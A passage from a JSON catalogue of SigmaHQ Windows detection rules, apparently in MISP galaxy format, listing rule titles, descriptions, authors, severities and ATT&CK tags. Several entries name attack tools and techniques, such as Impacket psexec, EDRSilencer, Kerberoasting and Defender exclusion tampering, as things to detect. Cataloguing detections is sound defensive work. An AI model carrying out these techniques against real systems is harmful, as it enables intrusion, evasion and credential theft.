"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7ec15688-fd24-4177-ba43-1a950537ee39", "value": "The Windows Defender Firewall Service Failed To Load Group Policy" }, { "description": "Detects when all the rules have been deleted from the Windows Defender Firewall configuration", "meta": { "author": 
"frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-17", "falsepositive": "No established falsepositives", "filename": "win_firewall_as_delete_all_rules.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_all_rules.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "79609c82-a488-426e-abcf-9f341a39365d", "value": "All Rules Have Been Deleted From The Windows Firewall Configuration" }, { "description": "Detects when a rule has been added to the Windows Firewall exception list", "meta": { "author": "frack113", "creation_date": "2022-02-19", "falsepositive": "No established falsepositives", "filename": "win_firewall_as_add_rule.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", "value": "Uncommon New Firewall Rule Added In Windows Firewall Exception List" }, { "description": "Detects the addition of a new \"Allow\" firewall rule by the WMI process (WmiPrvSE.EXE).\nThis can occur if an attacker 
leverages PowerShell cmdlets such as \"New-NetFirewallRule\", or directly uses WMI CIM classes such as \"MSFT_NetFirewallRule\".\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-05-10", "falsepositive": [ "Administrator scripts or activity." ], "filename": "win_firewall_as_add_rule_wmiprvse.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170", "https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule_wmiprvse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eca81e8d-09e1-4d04-8614-c91f44fd0519", "value": "New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE" }, { "description": "Detects activity when the settings of the Windows firewall have been changed", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-02-19", "falsepositive": "No established falsepositives", "filename": "win_firewall_as_setting_change.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ 
{ "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", "value": "Windows Firewall Settings Have Been Changed" }, { "description": "Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.", "meta": { "author": "frack113", "creation_date": "2023-02-26", "falsepositive": [ "Unknown" ], "filename": "win_firewall_as_add_rule_susp_folder.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", "value": "New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application" }, { "description": "Detects when a single rule or all of the rules have been deleted from the Windows Defender Firewall", "meta": { "author": "frack113", "creation_date": "2022-02-19", "falsepositive": "No established falsepositives", "filename": "win_firewall_as_delete_rule.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", "value": "A Rule Has Been Deleted From The Windows Firewall Exception List" }, { "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-14", "falsepositive": [ "Legitimate package hosted on a known and authorized remote location" ], "filename": "win_diagnosis_scripted_load_remote_diagcab.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/j00sean/status/1537750439701225472", "https://twitter.com/nas_bench/status/1539679555908141061", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" ], "tags": [ "attack.execution" ] }, "uuid": "50cb47b8-2c33-4b23-a2e9-4600657d9746", "value": "Loading Diagcab Package From Remote Path" }, { "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", "meta": { "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "creation_date": "2017-08-22", "falsepositive": [ "Unknown (data set is too small; further testing needed)" ], "filename": "win_security_wmi_persistence.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://twitter.com/mattifestation/status/899646620148539397", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88", "value": "WMI Persistence - Security" }, { "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-02-16", "falsepositive": [ "Programs that connect locally to the RDP port" ], "filename": "win_security_rdp_reverse_tunnel.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", "https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.lateral-movement", "attack.t1090.001", "attack.t1090.002", "attack.t1021.001", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "value": "RDP over Reverse SSH Tunnel WFP" }, { "description": "Potential adversaries accessing the 
microphone and webcam in an endpoint.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-06-07", "falsepositive": [ "Unknown" ], "filename": "win_security_camera_microphone_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", "https://twitter.com/duzvik/status/1269671601852813320", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" ], "tags": [ "attack.collection", "attack.t1123" ] }, "related": [ { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8cd538a4-62d5-4e83-810b-12d41e428d6e", "value": "Processes Accessing the Microphone and Webcam" }, { "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. 
Possible Rubeus tries to get a handle to LSA.", "meta": { "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unknown" ], "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" ], "tags": [ "attack.lateral-movement", "attack.privilege-escalation", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "value": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'" }, { "description": "Detects Obfuscated Powershell via Stdin in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "value": "Invoke-Obfuscation Via Stdin - Security" }, { "description": "Detects non-system users performing privileged operations on the SCM database", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "creation_date": "2019-08-15", "falsepositive": [ "Unknown" ], "filename": "win_security_scm_database_privileged_operation.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", "value": "SCM Database Privileged Operation" }, { "description": "Alerts on Metasploit host's authentications on the domain.", "meta": { "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "creation_date": "2020-05-06", "falsepositive": [ "Linux hostnames composed of 16 characters." 
], "filename": "win_security_metasploit_authentication.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "72124974-a68b-4366-b990-d30e0b2a190d", "value": "Metasploit SMB Authentication" }, { "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", "meta": { "author": "OTR (Open Threat Research)", "creation_date": "2018-11-28", "falsepositive": [ "Domain Controllers acting as printer servers too? 
:)" ], "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/_dirkjan/status/1309214379003588608", "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", "value": "DCERPC SMB Spoolss Named Pipe" }, { "description": "Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.\n", "meta": { "author": "Thodoris Polyzos (@SmoothDeploy)", "creation_date": "2024-01-29", "falsepositive": [ "Unknown" ], "filename": "win_security_hktl_edr_silencer.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/netero1010/EDRSilencer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hktl_edr_silencer.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98054878-5eab-434c-85d4-72d4e5a3361b", "value": "HackTool - EDRSilencer Execution - Filter Added" }, { "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", "meta": { "author": 
"Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-09-12", "falsepositive": [ "Legitimate use of remote PowerShell execution" ], "filename": "win_security_remote_powershell_session.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", "value": "Remote PowerShell Sessions Network Connections (WinRM)" }, { "description": "An attacker can use the SID history attribute to gain additional privileges.", "meta": { "author": "Thomas Patzke, @atc_project (improvements)", "creation_date": "2017-02-19", "falsepositive": [ "Migration of an account into a new domain" ], "filename": "win_security_susp_add_sid_history.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=1772", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1134.005" ] }, "related": [ { "dest-uuid": "b7dc639b-24cd-482d-a7f1-8897eda21023", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2", "value": "Addition of SID History to Active Directory Object" }, { "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-09", "falsepositive": [ "Legitimate use of encrypted ZIP files" ], "filename": "win_security_susp_opened_encrypted_zip.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1523383197513379841", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", "value": "Password Protected ZIP File Opened" }, { "description": "Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.\n", "meta": { "author": "@BarryShooshooga, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-26", "falsepositive": [ "Unknown" ], "filename": "win_security_windows_defender_exclusions_write_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_windows_defender_exclusions_write_access.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", "value": "Windows Defender Exclusion Registry Key - Write Access Requested" }, { "description": "Detects WRITE_DAC access to a domain object", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-09-12", "falsepositive": [ "Unknown" ], "filename": "win_security_ad_object_writedac_access.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html", "https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html", "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222.001" ] }, "related": [ { "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", "value": "AD Object WriteDAC Access" }, { "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", "meta": { "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "creation_date": "2020-08-06", "falsepositive": [ "Unknown" ], "filename": "win_security_smb_file_creation_admin_shares.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file", "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b210394c-ba12-4f89-9117-44a2464b9511", "value": "SMB Create Remote File Admin Share" }, { "description": "Detects service ticket requests using RC4 encryption type", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-02-06", "falsepositive": [ "Service accounts used on legacy systems (e.g. NetApp)", "Windows Domains with DFL 2003 and legacy systems" ], "filename": "win_security_susp_rc4_kerberos.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=3458", "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39", "value": "Suspicious Kerberos RC4 Ticket Encryption" }, { "description": "Detects execution of Impacket's psexec.py.", "meta": { "author": "Bhabesh Raj", "creation_date": "2020-12-14", "falsepositive": [ "Unknown" ], "filename": "win_security_impacket_psexec.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "32d56ea1-417f-44ff-822b-882873f5f43b", "value": "Impacket PsExec Execution" }, { "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "filename": "win_security_lm_namedpipe.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/menasec1/status/1104489274387451904", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "value": "First Time Seen Remote Named Pipe" }, { "description": "Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.\n", "meta": { "author": "Elastic, Josh Nickels, Marius Rothenbücher", "creation_date": "2024-09-04", "falsepositive": [ "Users allowed to perform these modifications (user found in field SubjectUserName)" ], "filename": "win_security_susp_group_policy_abuse_privilege_addition.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": 
"windows", "refs": [ "https://www.elastic.co/guide/en/security/current/group-policy-abuse-for-privilege-addition.html#_setup_275", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_group_policy_abuse_privilege_addition.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1484.001" ] }, "related": [ { "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c480e10-7ee1-46d4-8ed2-85f9789e3ce4", "value": "Group Policy Abuse for Privilege Addition" }, { "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_scheduled_task_creation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "value": "Suspicious Scheduled Task Creation" }, { "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", "meta": { "author": "Orlinum , BlueDefenZer", "creation_date": "2021-11-17", "falsepositive": [ "Administrator activity", "Proxy SSL certificate with subject modification", "Smart card enrollement" ], "filename": 
"win_security_adcs_certificate_template_configuration_vulnerability_eku.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" ], "tags": [ "attack.privilege-escalation", "attack.credential-access" ] }, "uuid": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "value": "ADCS Certificate Template Configuration Vulnerability with Risky EKU" }, { "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", "meta": { "author": "Tim Rauch (Nextron Systems), Elastic (idea)", "creation_date": "2022-09-15", "falsepositive": [ "Unknown" ], "filename": "win_security_service_installation_by_unusal_client.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", "https://www.x86matthew.com/view_post?id=create_svc_rpc", "https://twitter.com/SBousseaden/status/1490608838701166596", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "value": "Service Installed By Unusual Client - Security" }, { "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-02-19", 
"falsepositive": [ "User using a disabled account" ], "filename": "win_security_susp_failed_logon_reasons.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1101431884540710913", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9eb99343-d336-4020-a3cd-67f3819e68ee", "value": "Account Tampering - Suspicious Failed Logon Reasons" }, { "description": "Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.\n", "meta": { "author": "Elastic, Josh Nickels, Marius Rothenbücher", "creation_date": "2024-09-06", "falsepositive": [ "Legitimate execution by system administrators." 
